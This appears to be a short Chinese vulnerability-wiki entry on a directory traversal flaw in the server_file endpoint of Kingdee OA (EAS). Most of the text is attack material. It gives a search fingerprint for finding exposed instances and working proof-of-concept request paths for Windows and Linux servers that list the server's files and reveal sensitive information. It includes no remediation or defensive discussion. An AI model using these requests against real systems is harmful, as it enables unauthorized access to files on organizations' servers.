Last updated 3 years ago
Was this helpful?
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
金蝶OA
app="Kingdee-EAS"
登录界面为
漏洞POC
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows服务器 appmonitor/protected/selector/server_file/files?folder=C://&suffix= Linux服务器 appmonitor/protected/selector/server_file/files?folder=/&suffix=